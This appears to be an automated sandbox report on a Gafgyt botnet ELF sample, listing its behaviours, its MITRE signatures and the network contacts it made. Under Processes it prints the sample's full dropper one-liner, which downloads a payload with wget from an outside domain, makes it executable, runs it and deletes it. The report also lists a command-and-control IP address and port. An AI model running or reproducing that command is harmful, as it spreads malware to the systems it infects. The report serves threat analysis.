Analysis Overview
SHA256
a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a
Threat Level: Known bad
The file a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt family
Changes its process name
Executes dropped EXE
Modifies Watchdog functionality
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:18
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:18
Reported
2024-04-02 01:21
Platform
debian9-armhf-20240226-en
Max time kernel
147s
Max time network
138s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
| File opened for modification | /dev/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
[/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
| MD | 85.239.33.129:666 | tcp | |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp |